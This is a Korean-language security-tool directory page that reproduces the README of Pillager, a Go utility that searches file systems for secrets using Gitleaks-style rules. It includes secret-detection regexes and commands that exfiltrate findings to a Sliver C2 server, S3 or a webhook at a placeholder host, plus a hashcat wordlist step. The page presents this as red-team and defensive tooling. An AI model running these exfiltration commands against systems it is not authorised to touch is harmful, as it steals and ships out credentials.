Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/brittonhayes/pillager
Vulnerability ScannersData ExfiltrationInformation GatheringPenetration TestingUtilities & FrameworksSecret DetectionRed Teaming
GitHubbrittonhayes/pillager

pillager

Go로 파일 시스템을 뒤져 민감 정보를 찾아내기 🔍

저장소 보기
3112239개월 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Pillager

Go Reference Latest Release Go Report Card Tests

Go를 사용하여 파일 시스템에서 민감한 정보를 탐색하세요.

목차

  1. 개요
  2. 설치
  3. 사용법
  4. 데이터 유출
  5. 문서

개요

Pillager는 Go의 강력한 동시성 모델을 활용하여 파일 내 민감한 정보를 재귀적으로 디렉터리에서 검색하는 간단한 방법을 제공하도록 설계되었습니다. Pillager는 몇몇 거인들의 어깨 위에 서서 이를 수행합니다. Pillager가 지정된 패턴과 일치하는 파일을 찾으면, 각 작업자(worker)가 작업 큐에서 파일의 한 줄씩 가져와 민감한 패턴 일치를 찾는 일련의 동시 작업자들을 사용하여 파일을 스캔합니다. 사용 가능한 패턴 필터는 pillager.toml 파일에서 정의하거나 기본 규칙 집합을 사용할 수 있습니다.

설치

Go

시스템에 Go가 설정되어 있다면 go install로 Pillager를 설치할 수 있습니다.

root@kitploit:~
go install github.com/brittonhayes/pillager@latest

Scoop (Windows)

root@kitploit:~
scoop bucket add pillager https://github.com/brittonhayes/pillager-scoop.git
scoop install pillager

Homebrew (OSX/Linux)

root@kitploit:~
brew tap brittonhayes/homebrew-pillager
brew install pillager

Docker 이미지

root@kitploit:~
docker run --rm -it ghcr.io/brittonhayes/pillager:latest hunt .

바이너리를 찾고 있다면 최신 릴리스에서 시스템에 맞는 실행 파일을 확인하세요.

사용법

pillager로 사용 가능한 모든 명령을 보려면

root@kitploit:~
# 전체 애플리케이션에 대한 지침 보기
pillager

# 하위 명령에서
pillager [cmd] --help

사용자 인터페이스

Pillager는 대화형으로 비밀을 스캔하려는 경우 bubbletea로 구축된 터미널 사용자 인터페이스를 제공합니다.

asciicast

데이터 유출

발견된 비밀을 원격 대상으로 전송합니다: Sliver C2 (전리품/자격 증명 저장소), S3/MinIO (클라우드 스토리지), 또는 Webhooks (사용자 지정 HTTP 엔드포인트).

root@kitploit:~
# Sliver C2 - 자격 증명 구문 분석과 함께 팀서버로 전송
pillager hunt /target --exfil sliver \
  --sliver-config ~/.sliver-client/configs/operator.cfg

# S3/MinIO - 암호화하여 업로드
pillager hunt /target --exfil s3 \
  --s3-bucket red-team-findings \
  --s3-endpoint https://minio.internal:9000 \
  --exfil-encrypt env:EXFIL_KEY

# Webhook - 사용자 지정 엔드포인트로 POST
pillager hunt /target --exfil webhook \
  --webhook-url https://your-server.com/findings \
  --webhook-header "Authorization: Bearer token"

보안: AES-256-GCM 암호화 (--exfil-encrypt), 기본 TLS, 자동 메타데이터 (호스트명, 타임스탬프)


구성

Gitleaks 규칙

Pillager는 Gitleaks1 규칙을 완전히 지원합니다. 이는 pillager.toml 파일의 rules2 섹션에 전달하거나 config 플래그를 비워두면 기본 규칙 집합을 사용할 수 있습니다.

root@kitploit:~
# pillager.toml
# 기본 구성
verbose = false 
redact = false 

# 비밀 감지 규칙
[[rules]]
description = "AWS 액세스 키"
id = "aws-access-key"
regex = '''(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}'''
tags = ["aws", "credentials"]

[[rules]]
description = "AWS 비밀 키"
id = "aws-secret-key"
regex = '''(?i)aws(.{0,20})?(?-i)['\"][0-9a-zA-Z\/+]{40}['\"]'''
tags = ["aws", "credentials"]

[[rules]]
description = "GitHub 토큰"
id = "github-token"
regex = '''ghp_[0-9a-zA-Z]{36}'''
tags = ["github", "token"]

[[rules]]
description = "개인 키"
id = "private-key"
regex = '''-----BEGIN (?:RSA|OPENSSH|DSA|EC|PGP) PRIVATE KEY( BLOCK)?-----'''
tags = ["key", "private"]

# 허용 목록 구성
[allowlist]
paths = [
    ".*/_test\\.go$",
    ".*/testdata/.*",
    ".*\\.md$",
    ".*/vendor/.*"
]
regexes = [
    "EXAMPLE_KEY",
    "DUMMY_SECRET"
] 

내장 출력 형식

Pillager는 다양한 내장 출력 형식을 제공합니다. 원하는 형식을 선택하세요!

기본

root@kitploit:~
pillager hunt .

JSON

root@kitploit:~
pillager hunt ./example -f json | jq

JSON 출력은 강력한 jq 유틸리티와 완벽하게 호환되어 쉽게 파싱할 수 있도록 설계되었습니다.

단어 목록

root@kitploit:~
# pillager를 사용하여 발견 항목에서 줄바꿈으로 구분된 단어 목록 생성
pillager hunt . -f wordlist 
root@kitploit:~
# pillager를 사용하여 단어 목록에 추가한 후 선호하는 hashcat 공격 모드 사용
pillager hunt ./ -f wordlist >> rockyou.txt && hashcat -a 0 hash.txt rockyou.txt
더 많은 출력 형식 보려면 클릭

JSON Pretty

root@kitploit:~
pillager hunt . -f json-pretty

HTML

root@kitploit:~
pillager hunt . -f html > results.html

Markdown

root@kitploit:~
pillager hunt . -f markdown > results.md

CSV

root@kitploit:~
pillager hunt . -f csv > results.csv

사용자 지정 Go 템플릿

root@kitploit:~
pillager hunt . --template "{{ range .}}Secret: {{.Secret}}{{end}}"

파일에서 사용자 지정 Go 템플릿

root@kitploit:~
pillager hunt . -t "$(cat mytemplate.tmpl)"

사용자 지정 템플릿

Pillager는 강력한 go text/template 및 sprig 함수를 사용하여 출력 형식을 사용자 지정할 수 있습니다. 다음은 몇 가지 템플릿 예제입니다.

기본

root@kitploit:~
{{ range . -}}
    File: {{ .File }}
    Secret: {{ .Secret}}
    Description: {{ quote .Description }}
{{ end -}}

마크다운 스타일링

root@kitploit:~
# Results

{{ range . -}}
    ## {{ .File }}
    - Location: {{.StartLine}}
{{end}}

더 많은 템플릿 예제는 templates 디렉터리에서 찾을 수 있습니다.

문서

GoDoc 문서는 pillager용 pkg.go.dev에서 확인할 수 있습니다.

개발

Pillager의 기능 개발 및 수정에 참여하려면 다음을 시작하세요:

  • Go 설치
  • Taskfile.dev 설치
  • CONTRIBUTING.MD 읽기

거인의 어깨 ⭐

spf13's Cobra

Cobra란 무엇인가요?

Cobra는 git 및 go 도구와 유사한 강력한 현대 CLI 인터페이스를 만들기 위한 간단한 인터페이스를 제공하는 라이브러리입니다. Cobra는 또한 Cobra 기반 애플리케이션을 신속하게 개발할 수 있도록 애플리케이션 스캐폴딩을 생성하는 애플리케이션입니다.

이전에 Go로 작성된 CLI를 본 적이 있다면, 그것이 Cobra로 구축되었을 가능성이 매우 높습니다. 이 라이브러리를 아무리 추천해도 지나치지 않습니다. Cobra는 개발자가 일관되고 동적이며 자체 문서화된 명령줄 도구를 쉽게 만들 수 있게 해줍니다. 몇 가지 예로는 kubectl, hugo, GitHub의 gh CLI가 있습니다.

Gitleaks

Gitleaks란 무엇인가요?

Gitleaks1는 git 저장소에서 비밀번호, API 키, 토큰과 같은 하드코딩된 비밀을 감지하기 위한 SAST 도구입니다.

Gitleaks는 비밀 유출 방지를 위한 훌륭한 도구입니다. 아직 Gitleaks를 pre-commit 검사기로 구현하지 않았다면 확인해 볼 가치가 있습니다.

Gitleaks가 Pillager와 어떤 관련이 있나요?

Pillager는 발견된 비밀을 제시하고 처리하는 데 다른 접근 방식을 취하면서 Gitleaks의 강력한 규칙 기능을 구현합니다. 기본 규칙 집합을 제공했지만, 사용자가 자신의 사용 사례에 맞는 규칙을 만들 수 있도록 허용하면 Pillager가 훨씬 더 강력해집니다.

기본 규칙 집합은 포함된 규칙2을 확인하세요.


두말할 필요도 없지만 그래도 말하겠습니다. 저는 pillager 사용으로 인한 어떤 결과에 대해서도 책임지지 않습니다. 이 도구는 방어 목적, 교육 목적, 그리고 모든 관련 당사자의 동의를 받은 보안 연구자 사용을 위한 것입니다. pillager를 사용한 악의적인 행위는 결코 용납되거나 권장되지 않습니다. 이 도구를 책임감 있게 사용하고, 시스템에서 비밀을 스캔하기 전에 반드시 권한을 얻었는지 확인하십시오.

핵심적으로 Pillager는 MITRE ATT&CK3 프레임워크에 문서화된 일반적인 자격 증명 유출 원인이 시스템에 영향을 미치는지 확인하는 데 도움을 주도록 설계되었습니다.

MITRE ATT&CK 기술 - T1552,003 - 안전하지 않은 자격 증명: Bash 히스토리

MITRE ATT&CK 기술 - T1552,001 - 안전하지 않은 자격 증명: 파일 내 자격 증명

Footnotes

  1. https://raw.githubusercontent.com/brittonhayes/pillager/main/%5BGitleaks%5D(https:/github.com/gitleaks/gitleaks) ↩ ↩2

  2. Gitleaks 규칙 참조 ↩ ↩2

  3. MITRE ATT&CK 웹사이트 ↩

도구 다운로드